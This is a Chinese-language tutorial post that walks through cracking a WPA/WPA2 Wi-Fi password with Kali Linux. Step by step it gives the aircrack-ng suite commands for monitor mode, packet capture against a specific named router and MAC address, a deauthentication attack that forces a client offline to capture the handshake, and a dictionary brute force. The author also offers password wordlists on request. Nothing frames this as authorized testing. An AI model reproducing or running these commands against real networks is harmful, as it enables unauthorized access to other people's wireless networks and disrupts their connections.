Java教程

使用KALI破解WIFI(wpa/wpa2)密码

本文主要是介绍使用KALI破解WIFI(wpa/wpa2)密码,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!

前言
本文直接使用kali操作系统进行相关操作,未使用虚拟机,在此不赘述虚拟机配置
如需要即插即用kali操作系统,可戳我。
正文

  1. 使用命令iwconfig,确定哪些无线解控是可用的,如图所示,无线网卡名称为wlan0。
    在这里插入图片描述

  2. 使用airmon-ng命令监控无线传输,为监控模式 (monitor mode)设置拥有无线功能Kali通信接口

airmon-ng wlan0 start

在这里插入图片描述

  1. 命令返回的描述中表明有些进程可能会引起trouble,需要将其kill掉,使用命令
airmon-ng check kill

在这里插入图片描述

  1. 使用iwconfig,查看端口监听状态,如图所示,无线网卡名称已变为wlan0mon,表明监听成功。
    在这里插入图片描述

  2. 使用以下命令查看本地无线环境:

airodump-ng wlan0mon

在这里插入图片描述
主要参数:

BSSID:标识无线接入点或路由器的MAC地址
PWR:无线功率,数值越大,信号越好
CH:广播频道
ENC:加密技术
ESSID:无线路由名称
  1. 检测无线网卡是否有数据包注入能力
aireplay-ng -9 wlan0mon

在这里插入图片描述

  1. 以破解名称为“TPGuest_31D2”的路由器为例,使用命令对其抓包并写入文件“/root/wifi/TPGuest_31D2”
airodump-ng wlan0mon --bssid CE:46:99:8A:31:D2 -c 1 --showack -w /root/wifi/TPGuest_31D2

在这里插入图片描述

  1. 如果我们只有一般的数据包,是无法进行密码破解的,我们需要的是用户连接WiFi时的握手包。
  2. 为了能尽快得到握手包,我们需要主动发送一个反认证包,断开设备与路由器的连接,迫使他重新进行连接
aireplay-ng -0 10 -a CE:46:99:8A:31:D2 -c CE:60:EA:E5:68:35 wlan0mon

在这里插入图片描述

0:表示我们正在启动一个取消鉴定攻击
10:表明我们将发送10个取消鉴定数据包
-a:目标接入点(路由器)BSSID
-c:需断开的客户端MAC地址
  1. 注:如果注入反认证包时,提示“mom0 is on channel x,but the AP uses channel x”时,需要关掉监听
airmon-ng stop wlan0mon
关闭后,重新进行抓包写入
airodump-ng wlan0 --bssid CE:46:99:8A:31:D2 -c 1 --showack -w /root/wifi/TPGuest_31D2
再执行注入反认证包
aireplay-ng -0 10 -a CE:46:99:8A:31:D2 -c CE:60:EA:E5:68:35 wlan0
  1. 检测到HandShake字样后,或该设备重新上线后,结束抓包
  2. 接下来就交给爆破字典进行暴力破解了
aircrack-ng -w /....../password.txt /root/wifi/TPGuest_31D2.cap
password.txt指代你的字典文件
TPGuest_31D2.cap为抓包写入的文件
  1. 提示KEY FOUND![password]时,破解成功。
  2. 破解是一个考验耐心的事情。可私信索取题主收藏的部分爆破字典。
这篇关于使用KALI破解WIFI(wpa/wpa2)密码的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!